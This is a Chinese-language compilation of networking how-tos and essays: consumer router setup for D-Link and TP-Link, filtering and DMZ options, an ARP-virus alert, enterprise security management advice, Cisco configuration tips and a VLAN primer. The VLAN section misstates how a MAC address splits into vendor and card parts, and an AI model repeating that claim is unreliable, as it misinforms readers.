本篇文章以宽带路由器D-Link的di-740p型号，默认管理地址为192.168.0.1，管理端口是8080。

将一台计算机的ip地址和路由器管理地址设置在同一网段，例如192.168.0.2，打开192.168.0.2计算机的浏览器，在地址栏输入“http：//192.168.0.1:8080”后按回车键即出现用户登陆提示窗口，输入宽带路由器说明书中的默认管理账户和密码进入设置界面。

　　为了让路由器能够自动拨号，我们还需要将ADSL账号集成到路由器中。

　　点击上方的“首页”标签，然后点击作变的“WAN”，在PPP over Ethernet处看到设置ADSL账号的地方，输入自己申请的ADSL账号和密码后保存设置。

　　现在到“系统状态”标签中的“系统信息”处察看联网状态，在WAN端可以清晰地看到ADSL拨号获得的网络信息。

　　设置完ADSL账号后，我们就可以通过宽带路由器上网了，不过为了更好的管理和提高安全性还需要进行如下操作：点击“首页”标签，然后在左边选择“DHCP”，在DHCP服务器可进入的ip范围处设置ip地址范围，保存后宽带路由器就具备自动分配ip地址的功能了。

　　防止乱下bt

　　默认设置所有连接到路由器的计算机都是受到保护的，也就是说处于内网中，使用bt等p2p软件会受到一定的影响。我们可以用“进阶设定”标签中的“DMZ”来设置宣告的主机。在这里设置的主机就暴露在网络中，一方面可以无所顾虑地使用bt下载软件和建立iis、ftp服务器等，而另一方面也暴露在黑客与病毒面前，因此该计算机的安全性工作一定要做好。（如果仅仅是为了使用bt等p2p软件而对主机进行宣告的话则是非常不明智的，其实我们可以使用upnp功能来解决内网不能使用p2p软件的问题。方法是点击路由器设置界面的“工具”标签下的“其他项目”，然后将upnp设定为“启动”即可。）

　　进入宽带路由器设置界面中的过滤器标签，我们可以对数据报的来源及地址进行多种项目的过滤，包括ip地址、url信息、mac地址以及区域信息等。

　　设置“激活”ip地址过滤，然后在ip地址范围内处输入ip地址，如192.168.0.111。“埠范围”处实际上填写的是端口信息，由于bt下载使用的是6881到6889端口，所以我们在这里进行过滤即可。“协议”选择tcp，“排程”设置该过滤生效的时间（禁止时间看实际情况而定）。

　　服务和安全两不误

　　计算机暴露在internet上黑客和病毒就有可能利用漏洞攻击计算机，其实我们可以通过设置虚拟服务器来解决这个问题。

　　登陆到宽带路由器设置界面。选择进阶设置界面中的虚拟服务器标签。将虚拟服务器设置激活，输入相关的虚拟服务器信息即可。例如我们要容许192.168.0.112这台计算机提供ftp服务，但又希望让其他端口得到路由器的保护的话，可以仅仅将ftp服务进行虚拟即可。个人ip地址设置为192.168.0.112，协议模式是tcp（ftp服务使用tcp协议），个人端口21（ftp使用21端口）。另外在“排成”处可以设置该虚拟服务生效的时间段。
tp-link路由器配置指南

　　对路由器进行基本配置，使电脑通过路由器实现共享上网，过程相对来说比较容易实现；这篇文档下面的内容，主要讲述如下几部分：
　　1， 收集并判断信息，为配置路由器做准备；




　　2， 进入路由器管理界面，对路由器进行配置；
　　3， 配置过程简单的故障定位排除！

　　1， 置路由器前的准备工作（如果你对你自己的连接方式清楚，可以直接跳到第2点）

　　第一个需要确认的就是您的“宽带接入方式”是怎样的？
　　当然，最简捷的办法就是给您的ISP（互联网服务提供商）打个电话咨询一下；也可以通过您购买路由器以前的网络连接方式进行快速判断。
　　常见的硬件连接方式有下面几种：
　　1， 电话线 —> ADSL MODEM —> 电脑
　　2，双绞线（以太网线）—> 电脑
　　3，有线电视（同轴电缆）—> Cable MODEM —> 电脑
　　4，光纤 —> 光电转换器 —> 代理服务器 —> PC

　　ADSL / VDSL PPPoE ：电脑上运行第三方拨号软件如Enternet300或WinXP 系统自带的拨号程序，填入ISP提供的账号和密码，每次上网前先要拨号；

　　或者您的ADSL MODEM 已启用路由功能，填入了ISP提供的账号和密码，拨号的动作交给 MODEM 去做；（这种宽带接入方式典型的比如南方电信提供的“ 网络快车 ”）

　　静态IP ：ISP提供给您固定的IP地址、子网掩码、默认网关、DNS ；

　　动态IP ：电脑的TCP/IP属性设置为“自动获取IP地址”，每次启动电脑即可上网；（这种宽带接入方式典型的比如深圳“天威视讯”）

　　802.1X+静态IP ：ISP提供固定的IP地址，专用拨号软件，账号和密码 ；

　　802.1X+动态IP ：ISP提供专用拨号软件，账号和密码 ；

　　WEB认证 ：每次上网之前，打开IE浏览器，先去ISP指定的主页，填入ISP提供的用户名密码，通过认证以后才可以进行其他得上网操作；
　　（上面的黑体字就是您的宽带接入方式，接入方式和硬件连接方式并不是固定搭配的）

　　上面提到的这些连接认证方式只是普及率比较高的一些宽带接入方式，当然还会有其他的拓扑连接以及认证方式的存在；所以，当您不能肯定自己的宽带方式的时候，最好向ISP咨询：自己装的宽带接入，IP地址是静态的还是动态的？认证使用的协议是PPPoE、802.1X还是WEB认证？当上面的两个问题有了答案，就可以对路由器进行配置了
2， 怎样进入路由器管理界面？

　　先参照《用户手册》上面的图示，将ADSL MODEM、路由器、电脑连结起来；




　　TL-R4XX系列路由器的管理地址出厂默认：IP地址：192. 168. 1. 1 ，子网掩码：255. 255. 255. 0 （TL-R400 和TL-R400+ 两款的管理地址默认为：192. 168. 123. 254 ，子网掩码：255. 255. 255. 0）用网线将路由器LAN口和电脑网卡连接好，因为路由器上的以太网口具有极性自动翻转功能，所以无论您的网线采用直连线或交叉线都可以，需要保证的是网线水晶头的制作牢靠稳固，水晶头铜片没有生锈等。

　　电脑桌面上右键点击“网上邻居”，选择“属性”，在弹出的窗口中双击打开“本地连接”，在弹出的窗口中点击“属性”，然后找寻“Internet协议（TCP/IP）”，双击弹出“Internet协议（TCP/IP）属性”窗口；
　　在这个窗口中选择“使用下面的IP地址”，然后在对应的位置填入：
　　IP地址 ：192. 168. 1. X（X范围2-254）、
　　子网掩码：255. 255. 255. 0 、
　　默认网关：192. 168. 1. 1 ，填完以后“确定”两次即可；

　　3，检查电脑和路由器能不能通讯？

　　可采用如下办法查看，打开电脑的DOS界面：
　　“开始”—>“程序”，点击“MS-DOS” （Win98操作系统）
　　“开始”—>“程序”—“附件”，点击“命令提示符” （Win2000/XP操作系统）

　　一是检查上面的IP地址配置是否生效？

　　在DOS窗口输入：ipconfig/all 并回车，当看到类似如下信息，表示配置生效 ，
　　IP Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192. 168. 1. 10
　　Subnet Mast . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .: 255. 255. 255. 0
　　Default Gateway. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192. 168. 1. 1

　　二是从电脑往路由器LAN口发送数据包，看数据包能不能返回？在DOS窗口运行：

　　ping 192. 168. 1. 1 –t 并回车，如果出现如下类似信息，
　　Reply from 192. 168. 1. 1 : bytes=32 time<10ms TTL=128 Reply from 192. 168. 1. 1 : 　　　bytes=32 time<10ms TTL=128 Reply from 192. 168. 1. 1 : bytes=32 time<10ms TTL=128 如果回车后没有出现上面的信息，确提示输入的命令“不是内部命令或外部命令，也不是可运行的程序或批处理程序”，则说明命令输入有误，请检查空格之类的输入是否被忽略；

　　4，进入路由器管理界面；出现提示信息，表示电脑可以和路由器通讯了，打开IE浏览器，在地址栏输入 192. 168. 1. 1 并回车，正常情况下会出现要求输入用户名和密码的对话框。
　当然，也有例外情况： 如果打开IE浏览器地址栏输入地址回车，弹出“脱机工作”的对话框，点即“连接”后出现拨号的小窗口，请点击IE浏览器菜单栏的“工具”—“Internet选项”，在弹出的对话框内点击“连接”属性页，界面如下图： 进行了上面的操作，



应该说进入路由器管理界面应该没有什么障碍了；

　　5，开始配置路由器；有了刚开始时对宽带接入方式的信息准备，配置起来方便多了；刚进入路由器管理界面，会弹出一个类似下图“设置向导”界面，可以取消不理它； 进入路由器管理界面，在左列菜单栏中点击“网络参数”—>“WAN口设置”，就在这里配置路由器面向Internet方向的WAN口的工作模式，这是最关键的一步；

　　假设您的宽带接入方式为 ADSL PPPoE ，那就选择“WAN口连接类型”为“PPPoE”，填入“上网账号” 、“上网口令”，如果您是包月用户，再选择连接模式为：“自动连接”，点击“保存”即完成配置；保存完后“上网口令”框内填入的密码会多出几位，这是路由器为了安全起见专门做的；

　　然后您点击管理界面左列的“运行状态”，在运行状态页面“WAN口属性”，刚开始看不到对应的IP地址子网掩码默认网关DNS服务器等地址，就好像下面的这幅图，那说明路由器正在拨号过程中，等到这些地址都出现了相应的信息后，将其中的DNS服务器地址填入电脑“Internet协议（TCP/IP）”页面对应位置确定后，基本的设置就完成了，没有大碍的话可以冲浪了！

　　6，故障情况列举；

　　如果看不到任何地址，有下面几种原因导致，请逐一排除：

　　1） ADSL MODEM上一般都会有一个ADSL灯，正常情况下MODEM加电并接好电话线后，这个灯会大致规律性地快慢闪烁，闪烁最终停止变为长亮；如果这个灯无休止的闪啊闪就是不长亮，请联系并告知ISP您的ADSL MODEM同局端的交换机不能同步，这个ADSL/DSL灯长亮的条件，是必须的；

　　2） 在配置过程中填入“上网口令”的时候不小心输错，不妨重新输入一遍；

　　3） ADSL MODEM 启用了“路由模式”， 需要将ADSL MDOEM复位成“桥接模式”；怎么复位到桥接模式可以和MODEM厂家联系取得操作方法；也可以这样判断：电脑接MODEM，并且在电脑上拨号，拨号成功以后可以上网，如果是这种情况的话，则说明MODEM的工作方式是桥接模式，可以排除这一可能性；

　　4） ISP将电脑网卡的MAC地址帮定到了ADSL线路上；解决的办法就是使用路由器的“MAC地址克隆”功能，将网卡的MAC地址复制到路由器的WAN口；

　　如果上面的可能性都排除了，ADSL PPPoE拨号一般就没什么问题了，下面列举的是另2个值得关注的故障原因；

　　5） 您的宽带接入方式是那种以太网线直接引入，不是ADSL但同样需要拨号，拨号的软件不局限于一种，认证使用的协议也是PPPoE，但就是拨号成功不了；如果ISP承诺带宽是10Mbps ，建议：找个10/100M自适应的集线器，将宽带进线接在集线器上，然后再连结集线器到路由器WAN口；经过这样一个速率适配的过程，拨号应该没有问题的；

　　6） 购买路由器前，您也是通过电脑运行拨号软件，填入用户名口令拨号。但拨号软件是ISP提供的专用软件，别的软件拨号是成功不了的；如果是这种情况，请联系ISP咨询一下：您的宽带接入，认证使用的协议是802. 1X 吗？如果是的，有种可能是认证系统在开发过程中加入私有信息，导致路由器拨号失败；
　7，其他配置

　　1） 安全设置




　　当可以正常上网了，可能出于不同的原因，您想要对内部局域网的电脑上网操作，开放不同的权限，比如只允许登录某些网站、只能收发E-mail、一部分有限制、一部分不限制；用户在这方面需求差异较大，有些通过路由器可以实现，有些用路由器是没办法完全实现的，比如“IP地址和网卡地址绑定”这个功能，路由器不能完全做到；

　　我们上网的操作，其实质是电脑不断发送请求数据包，这些请求数据包必然包含一些参数比如：源IP、目的IP、源端口、目的端口等等；路由器正是通过对这些参数的限制，来达到控制内部局域网的电脑不同上网权限的目的；

　　下面我们会列举具有代表性的配置举例，来说明路由器“防火墙设置”、“IP地址过滤”这些功能是怎样使用的？列举的事例以及上面红字部分的解释，都是为了帮助您尽可能理解各个功能参数的含义，只有理解了参数的含义，您才可以随心所欲的配置过滤规则，迅速实现您预期的目的，而不会因为配置错误导致不能使用这些功能，也不会因为由于得不到及时的技术支持而耽误您的应用；

　　“防火墙设置”页面，可以看到这是一个总开关的设置页面，凡是没有使用的功能，就请不要在它前面打钩选中；
　　除了总开关，再有就是两个过滤功能“缺省过滤规则”的确定，何谓缺省过滤规则？我们在具体规则设置页面里，定义一些特定的规则，对符合条件的数据包进行控制处理，而这儿的“缺省规则”顾名思义，限定的是我们定制的规则中没有涉及到不符合的数据包该怎么办？这个应该不难理解吧；
　　一个数据包，要吗符合我们设定的规则，要吗不符合我们设定的规则但同时必定符合缺省规则；

　　我们可以看到缺省的过滤规则，可以填加新条目；我们配置一条规则：限制内部局域网的一台电脑，IP地址192. 168. 1. 10，只让它登录www.tp-link.com.cn这个网站，别的任何操作都不行；
　　上面这条规则可以解读为：内网电脑往公网发送数据包，数据包的源IP地址是要限制的这台电脑的IP地址192. 168. 1. 10，数据包目的IP地址202. 96. 137. 26 ，也就是www.tp-link.com.cn这个域名对应的公网IP地址，广域网请求因为是针对网站的限制，所以端口号是80 ；规则设置好可以在配置好的规则页面清晰看到，规则生效时间是24小时，控制的对象是IP地址为
　　192. 168. 1. 10这台主机，局域网后面的端口默认不要填，广域网IP地址栏填入的是www.tp-link.com.cn对应的公网IP地址，端口号因为是网站所以填80，协议一般默认选择ALL就行了；是否允许通过呢？因为缺省规则是禁止不符合设定规则的数据包通过路由器，所以符合设定规则的数据包允许通过，规则状态为生效的；
　　如果您的规则中涉及对网站进行限制，也就是目的请求端口是80的，则应该考虑对应的将53这个端口对应数据包也允许通过，因为53对应的是去往“域名解析服务器”的数据包，用于将域名（如www.tp-link.com.cn）和IP地址（如202. 96. 137. 26）对应的，所以必须开！

　　配置“IP地址过滤规则”这个功能用来实现您的一些目的，最主要的是分析都要做那些控制，然后选择怎样的缺省规则？配置怎样的过滤规则？如果您决心了解这个功能的真正作用，通过仔细参考资料和在路由器上反复的实验，您一定可以完全掌握的！

近期有某种arp病毒在局域网里传播，感染该病毒后，会影响整个网段（宿舍区整单元、办公区整个楼层）计算机的正常上网，出现同一网段的大面积断网断线。请广大用户升级杀毒软件病毒库到最新版本，没有安装杀毒软件的用户，请下载下面的专杀工具进行查杀。
　　 注意：当附近所有人的计算机都不能正常上网，出现qq掉线等情况时，您的电脑却安然无恙，数据通信正常，这说明您的机器已经中了arp病毒，需要及时杀毒，否则，与您相邻的计算机将无法上网，您的硬盘上的数据也有被窃取的危险
未中毒而只是被攻击的电脑，防护办法如下：下载AntiArp3.5.0在本机安装运行，在“网关地址”中输入本机网关地址然后点击“获取网关MAC地址”按钮，再点击“自动防护”即可。
安全建议：

1 、给系统安装补丁程序。通过 Windows Update 安装好系统补丁程序 ( 关键更新、安全更新和 Service Pack)

2 、给系统管理员帐户设置足够复杂的强密码，最好能是 12 位以上，字母 + 数字 + 符号的组合；也可以禁用 / 删除一些不使用的帐户

3 、经常更新杀毒软件（病毒库），设置允许的可设置为每天定时自动更新。安装并使用网络防火墙软件，网络防火墙在防病毒过程中也可以起到至关重要的作用，能有效地阻挡自来网络的攻击和病毒的入侵。

4 、关闭一些不需要的服务，条件允许的可关闭一些没有必要的共享，也包括 C$ 、 D$ 等管理共享。完全单机的用户也可直接关闭 Server 服务

5 、不要随便点击打开 QQ 、 MSN 等聊天工具上发来的链接信息，不要随便打开或运行陌生、可疑文件和程序，如邮件中的陌生附件，外挂程序等。

另外,本人建议按装些防ARP欺骗的工具,网上很多,可以搜一下!

企业网络安全已经成为众多企业高度重视的话题，可不少企业购买了硬件防火墙等安全设备，可企业网络仍然遭遇到了病毒的侵蚀和黑客的攻击，原因在哪里呢？拥有硬件安全设备的企业网络为何还会受到安全的威胁呢？其实，要想保障网络安全，除了购买硬件安全设备之外，还需三分技术加七分管理才可。

谁在威胁企业网络安全？
要想保障企业网络的安全，必须清楚威胁企业网络安全的不利因素。除了病毒侵蚀和黑客的攻击之外，企业网络的管理漏洞也是威胁企业网络安全运营的一大诱因。在企业网络的运行中，防火墙和杀毒软件一定程度上可以阻挡病毒的侵蚀和黑客的攻击，但如果疏于管理，病毒库不更新，防火墙过滤规则不设置，病毒和攻击依然会光顾企业网络，这些不安全因素对企业造成的影响可想而知了。

企业网络的疏于管理，具体体现在以下几个方面：
1、网络硬件设置漏洞：在组建企业网络时，诸如防火墙和路由器这样的网络设备通常直接安装在网络中，企业网管也没有对这些网络设备进行安全设置。不难想象，工作在默认设置下的网络设备，无疑会让企业网络漏洞百出，这将会威胁企业网络的安全运行。

2、企业员工安全意识差：用户安全意识差也是威胁企业网络安全的一个重要因素，在使用中，很多企业员工经常会打开带有病毒的邮件，机器中毒之后通过企业网络传播，成为企业网络的不安全因素。还有一些企业员工对机器的密码及企业OA口令疏于管理，最后成为黑客的猎物，也成为威胁企业网络运行的不安全因素。

3、网络使用规范欠缺：网络的不规范使用，同样也会对企业网络造成一定的威胁。不少企业的网络是开放的，用户只要在企业的办公区域内，插上网线就可以登录企业网络。试想，一个对外人不设防的企业网络，还有安全可言吗？企业一定规范企业网络的使用，而且要建立一定的规则，用规则约束网络的使用。在技术手段上，建立网络登录验证，在使用上，禁止公司外的员工接入企业网络，用规则来保障企业网络的安全。

在威胁企业网络安全运行的上述因素中，除一些技术因素外，很多一些是企业管理上存在的漏洞。为此，企业网管必须学会用技术加管理的模式，加固企业的网络。

技术＋管理保障企业网络安全
根据企业网络运行中可能存在的安全漏洞，企业网管必须通过一定的手段进行防范。从威胁企业网络运行的诸多因素中可以得知，保障企业网络安全不仅需要有高超的技术，还要有完善的管理手段，三分技术加七分管理才能真正保障企业网络的安全。

1、企业管理者的重视
企业网络的安全运行并不仅仅是网管一个人的责任，是全体员工都必须配合的一项工作。要想得到企业全体员工的配合，企业管理者的重视是必须的，因为一名企业网管是无法让全体员工配合，也无法保证制订的安全管理规则能够在企业顺利实施。

企业网络的安全，关系到网络安全项目规划、用需求分析、网络技术应用、安全策略制定、人员职责分工、安全等级评定、网络用户管理、安全审计评价、人员安全培训、安全规章制度建立。苛刻的讲，企业网络安全是一个涉及企业管理和企业网络规划及配置的一个复杂问题，没有企业管理者的重视，企业网管人员的工作是无法开展的。为此，要想构建一个安全的企业网络，必须得到企业管理者的重视，这也是构建一个安全企业网络的基础。

2、用技术封堵安全漏洞
企业网络搭建完成之后，网管必须对网络安全进行全面加固。删除企业网络设备所有的默认设置，尤其是网络设备的默认管理IP地址，一定要自己重新配置。很多企业的网络都使用DHCP服务分配IP地址，这也是企业网络的一个不安全因素。建议企业使用静态分配的IP地址，防止未授权的用户登录网络。

一些企业网管为了方便管理，通常会开启网络设备的远程登录功能，殊不知方便的同时对企业网络也是一种安全隐患。为了安全，建议企业网管关闭远程登录功能，如果确实需要使用远程登录功能，建议开启远程登录安全验证，确保企业网络的安全。对于来自外界的网络攻击，企业网管必须及时进行防范，同时在防火墙的规则中加入新的过滤规则。出于安全的需求，尽量不要让企业的IP等信息暴露在互联网中，这样可以减少被攻击的机率。

平时，企业网管要多关注网络设备的日志文件，对于一些可疑的访问及网络数据包，一定要及时监管，并做出应对措施。对于企业的网络架构，网管要做好资料文档，记录企业网络的硬件配置情况，IP地址分配及设备编号等信息，如果企业网络添置了网络设备，以及计算机终端，企业网管也要及时做网络资料文档的更新，以备查阅。

3、用制度为企业网络保驾护航
民意有句谚语说得好“不怕贼偷，就怕贼惦记”，对于企业网络来说，最怕的也是黑客或一些恶意攻击者惦记。黑客攻防战是一个网络管理的较量战，因为黑客总是在挑企业网络的管理漏洞，而非技术漏洞，毕竟网管与黑客的技术水平都相当，寻找技术漏洞有一定的难度。这种情况之下，周密的制度将是防范黑客攻击的有效手段。

保障企业网络的管理制度
主要由以下几个制度组成，周密的制度会让企业网络一直保持安全的状态。

①机房管理制度：机房是企业网络的核心，也是重点的保护对象。在机房可以查找到企业网络的敏感信息。机房必须有严格的制度，包括机房出入制度，网络设备管理制度，故障排除制度等。

②安全保密制度：小到网络的IP规划，大到网络交换机及网络路由器的口令，这些都需要绝对的保密。对于大中型企业来说，企业网络有太多的机密信息，为此，企业必须制订一套完善的安全保密制度。

安全保密制度，主要是为了防止网管泄露企业网络的一些口令及网络信息。在安全保密制度中，尤其要强化网管与企业员工之间的保密制度规定，既便是在企业内部，网管也不要把网络的相关信息透露给企业普通员工，黑客要防，内贼更要防。

③定期安全评估制度：网络技术一日千里，网络漏洞更是层出不穷。以微软的操作系统为例，每月都会出现系统漏洞补丁，操作系统的漏洞也会影响企业网络的安全运行。诚然，网管已经为有漏洞的操作系统打上了补丁，但这并不意味着企业网络没有安全漏洞。要想保障企业网络的安全，必须定期对网络进行安全评估，并且形成一种制度。定期安全评估，主要是模拟黑客攻击的手法，对网络进行全方位的安全测试。

在企业网络的安全运行中，技术保障是基础，周密的安全防范制度是加固网络安全的一道天然屏障。要想保障企业网络的安全运行，技术和管理一个都不能少。

后记：企业网络的安全运行已经不仅仅是一个简单的技术问题，因为人是网络的使用者，太多的人为因素会干扰网络的安全运行，对网络的操作进行一系列的规范并形成制度，这是企业网络管理不可忽视的一面。一句话，企业网管安全，三分技术加上七分管理。

随便写点心得，欢迎大家补充
作网管的基本上都应该学会配置路由器，毕竟路由器是网络中最重要的网络设备之一。对于刚刚接触或者接触不久的网管来说，恐怕难免手忙脚乱，顾此失彼——当年俺头一次配置就让公司断网2小时那……所以留下一些经验给大家分享：
配置之前一定要先备份running-config和startup-config文件（在特权模式下使用命令copy run tftp和copy start tftp即可，当然你必须已经开启了tftp服务器），不要动ios镜像文件，一旦它出现问题，路由器恢复起来要大费周折。记住，只要备份run和start这两个配置文件就够了，路由器配置最容易出现问题的地方就是这两个。
千万小心使用命令w（write），他会把你可能有错的配置信息导入到路由器的启动芯片里，这样如果你配置错了，那么就无法采用重启这种简单的方法恢复正确的配置。记住对于运行中的路由器有影响的配置文件只有running-config文件，startup-config是不起任何作用的，只要你的配置命令完成，它会立刻起作用，如果没有出现你希望看到的结果，那么只能说明你配置错了，不要试图用write来”实现刷新当前配置“。
其实路由器说难不难，说容易也不容易，但是上面的两点注意到了，就不会有大问题，以后慢慢摸索了。
配置ACL注意事项：
更改ACL的时候，一定要确认自己已经将加载到网络接口上的ACL规则停止（特别是路由器与你直接建立连接的接口上，一定要确保没有ACL规则加载），然后再进行新的acl规则的添加或者旧规则的修改，否则非常容易把你自己踢出路由器。
添加ACL的时候要注意，如果对流量有比较高的要求，就要尽量减少规则的条数，并尽量不要在各个网络接口上都加载ACL规则，否则的话会增加路由器的负载，一旦有比较多的请求（比如BT）或者比较大的流量，路由器吃不消的可能性就极大，非常影响传输性能。

现在，若有哪家企业还没有搭建起自己的网络系统，那么人们一定会说：“这家企业太落后了！”这种“落后”现象，虽然目前在我国的现代企业中不多见了，但是在占我国企业总数98%以上的中小企业中，这种现象仍然屡见不鲜。

即使是多数中小企业赶上了时代的步伐，建立起了企业的网络系统，哪怕是企业的内部网，并在发展企业信息化建设中起到了举足轻重的作用。但是，由于许多中小企业的决策者对网络的应用和管理，在认识上存有一定的局限，以及受到现有企业条件和信息技术力量的局限，往往会在用网，尤其是在如何管理好企业的网络、挖掘和整合企业网络资源优势、为企业发展核心业务服务等诸多方面，还存有许多不尽如人意的地方，致使不少中小企业的网络系统，从建立网络，到应用网络，直至管理网络，都缺乏一个科学性、有序化和规范化的发展态势，甚至直接影响乃至制约着企业核心业务的持续发展。

所以，作为一家中小企业有必要搭建起一个管理企业网络的技术服务平台，以适应企业实现与国际竞争接轨、实现网络化和信息化的要求。当然，这也是日渐激烈的市场竞争，对中小企业的时代要求。为此，我们在这里套用一句时髦的话语，警醒中小企业，你们“网管”了吗？

那么，作为一家中小企业如何才能实现真正意义上的“网管”呢？

这不仅是企业决策者值得深思的问题，而且更应该是，在企业中从事网络建设、应用，尤其是网络管理专业人员不可推卸，也是应该应尽的一份责任；网络管理的专业人员更应在技术手段的实现和环节上，为企业决策者提供适应企业业务持续发展、现实可行的参考解决方案。一句话，中小企业更要：明明白白地建设好网，踏踏实实地应用好网，轻轻松松地管理好网。

在此，我们共同来分享一下来自不同行业、不同层面网络建设或网络管理从业者，对中小企业网络建设与管理的一些经验之谈。

　　一、网管系统建设思路要清晰、目的要明确

要想做好企业的网络管理工作，首先要从源头抓起。这一点，对于中小企业中的网络管理工作非常重要。就是说，网管员要从参与企业的网络管理系统的建设工作入手。

1.明确网络管理的目的

在建设网管系统前首先应确定网络管理的目的。在一般情况下，企业网络管理的主要目的是为了提高网络可用性、改进网络性能、减少和控制网络费用以及增强网络安全性等。网管员应根据自身情况进行补充与调整。在目的尚不明确的情况下，去搭建网管系统会造成资金的浪费和管理成本的无谓增加，就像“不量体就裁衣”，做出的衣服能合适吗？

2.掌握网络管理的要素

网络管理平台的建设要注意与企业业务需求的结合。完整而理想的网络管理解决方案，应该根据应用环境和网络对业务流程，以及用户需求的端到端关联关系，来管理网络及其所有设备。除向网管员报告服务器上的流程受阻，路由器上的流量过载或网络出现瓶颈外，理想的解决方案应该提供更多的功能。

3.明晰管理的网络资源

网络资源就是指网络中的硬件设备、整个环境中运行的软件（包括服务与电脑的应用软件）以及所提供的服务等。网络管理系统必须将它们表示出来，才能对其进行管理。 在好的网管软件中，当前的网络拓扑和各个硬件系统都以图形的方式显示在一个图上，而且各种信息都会动态地在上面显示，非常方便监视与管理。

4.注重软件资源管理和软件分发

网络管理系统的软件资源管理和软件分发功能，是指优化管理信息的收集，此外软件资源管理是对企业所拥有的软件授权数量和安装地点进行管理。软件分发则是通过网络把新软件分发到各个站点，并完成安装和配置工作。

5.应用管理不容忽视

应用管理用于测量和监督特定的应用软件及其对网络传输流量的影响。网络管理员通过应用管理可以跟踪网络用户和运行的应用软件，改善网络的响应时间。

　　二、网络管理要具备五大基本功能


网络管理一般包括性能、故障、配置、计费和安全五方面功能。

1.性能管理

主要考察网络运行的好坏。性能管理使网络管理员能够监视网络运行的参数，如吞吐率、响应时间、网络的可用性等。

2.故障管理

检测、定位和排除网络硬件和软件中的故障。当出现故障时，该功能确认故障，并记录故障，找出故障的位置并尽可能地排除这些故障。

3.配置管理

掌握和控制网络的状态，包括网络内各个设备的状态及其连接关系。配置管理的典型方法是，用逻辑图来描绘所有的网络设备及其逻辑关系，并将网络的确切物理布局，以适当的比例映射到这个逻辑图上。用精心设计的各种图标来表示各种网络对象，而这些图标又往往涂上不同颜色表示相应设备的不同状态。

4.计费管理

记录各个用户和应用程序对网络资源的使用情况。计账管理提供计算一个特定网络或网段的运行成本的手段。

5.安全管理

是对网络资源及其重要信息访问的约束和控制，包括验证网络用户的访问权限和优先级、检测和记录未授权用户企图进行的不应有的操作。

　　三、借助网管软件发挥管理效能


网管软件是网络管理员的眼睛、耳朵、手和脚，只有充分调动起各个“器官”，才能有效地发挥出网管的效能。

网管软件是网络管理员的眼睛、耳朵、手和脚，这么说一点也不过分。一个好的网管软件可以监控各个部分的运行情况，而不必经常去查看；在某个位置发生了变化时（像设备无响应、配置变化、软件安装/卸装等），网管软件可以实时地报告，并且可以支持中心的管理，不必跑到每个被管理对象的物理位置去处理。

但是，在选择网管软件时，应该注意以下几个方面的问题。

1.企业需要哪些管理功能

“企业需要哪些管理功能”这是中小企业的网管最应该注意的问题。网管软件都是价格不菲的，所以在为企业选择网管软件时，一定要考虑到目前与未来企业网络环境发展的需要。一个好的网络管理系统必须是适合企业业务发展的需要。

2.网络管理软件支持哪些标准

至少应支持SNMP和RMON。SNMP(Simple Network Management Protocol)简单网络管理协议，是一项广泛使用的网管协议,帮助网管人员管理TCP/IP网络中各种装置，没有繁复的指令，概念上只有“存/取”两种命令，其优点是简单、稳定和灵活，也是目前网管的基础标准，绝大多数的网络设备、软件都会支持。

3.RMON（Remote Monitor）

RMON MIB由一组统计数据、分析数据和诊断数据构成，利用许多供应商生产的标准工具都可以显示出这些数据，因而它具有独立于供应商的远程网络分析功能。RMON探测器和RMON客户机软件结合在一起在网络环境中实施RMON。RMON的监控功能是否有效，关键在于其探测器要具有存储。

统计数据历史的能力，这样就不需要不停地轮询才能生成一个有关网络运行状况趋势的视图。“RMON MIB功能组”功能框可以对通过RMOM MIB收集的网络管理信息类型进行描述。

如果可能的话，最好还支持RMON II。RMON II没有取代RMON，而是它的补充技术。RMON II在RMON标准基础上提供一种新层次的诊断和监控功能。RMON II标准能将网管员对网络的监控层次，提高到网络协议栈的应用层。因而，除了能监控网络通信与容量外，RMONII还提供有关各应用所使用的网络带宽量的信息，这是在客户机/服务器环境中进行故障排除的重要因素。

4.支持各种硬件、软件的范围

一般应可支持Sun、IBM、HP、NT、AT&T (NCR)、DEC、 Linux、Data General、Silicon Graphics、Motorola、Sequent、Pyramid、SCO Unix、Unisys、Windows 3.x / 95 / NT、OS/2 和Novell。在企业规模不大的情况下，至少可以支持Windows平台与三大主流Unix厂商Sun、IBM和HP。　　

除了硬件和操作系统（这是主机环境中系统管理工具的强项），还包括数据库和应用。

5.可管理性如何

网络设备的可用性和状态、性能测量和管理，是当今网络管理的重要组成部分。其中，性能测量和管理应当是网管软件的一个重要指标。

6.可扩展性如何

灵活地支持不可预测的扩展，如网络的大小，变更的速度或厂商的数量，而不用增加更多的人员和专门技术。同时，还要注意减少各厂商独有的操作规程或定制的脚本程序，来缩短学习过程，提高经理级管理人员的效率；对来自各方的系统管理工具的集成能力，还要考虑到企业预计要采用的管理工具。

7.协议的支持

对TCP/IP的支持是一个基本的要求，这里要注意的是，自己的局域网中是否有其他类型的协议，如IPX、SNA和DECnet等，企业所面对的网管软件是否支持。

什么是VLAN
　　VLAN（Virtual Local Area Network）又称虚拟局域网，是指在交换局域网的基础上，采用网络管理软件构建的可跨越不同网段、不同网络的端到端的逻辑网络。一个VLAN组成一个逻辑子网，即一个逻辑广播域，它可以覆盖多个网络设备，允许处于不同地理位置的网络用户加入到一个逻辑子网中。
　　
　　组建VLAN的条件
　　VLAN是建立在物理网络基础上的一种逻辑子网，因此建立VLAN需要相应的支持VLAN技术的网络设备。当网络中的不同VLAN间进行相互通信时，需要路由的支持，这时就需要增加路由设备——要实现路由功能，既可采用路由器，也可采用三层交换机来完成。
　　
　　划分VLAN的基本策略
　　从技术角度讲，VLAN的划分可依据不同原则，一般有以下三种划分方法：
　　
　　1、基于端口的VLAN划分
　　
　　这种划分是把一个或多个交换机上的几个端口划分一个逻辑组，这是最简单、最有效的划分方法。该方法只需网络管理员对网络设备的交换端口进行重新分配即可，不用考虑该端口所连接的设备。
　　
　　2、基于MAC地址的VLAN划分
　　
　　MAC地址其实就是指网卡的标识符，每一块网卡的MAC地址都是惟一且固化在网卡上的。MAC地址由12位16进制数表示，前8位为厂商标识，后4位为网卡标识。网络管理员可按MAC地址把一些站点划分为一个逻辑子网。
　　
　　3、基于路由的VLAN划分
　　
　　路由协议工作在网络层，相应的工作设备有路由器和路由交换机（即三层交换机）。该方式允许一个VLAN跨越多个交换机，或一个端口位于多个VLAN中。
　　
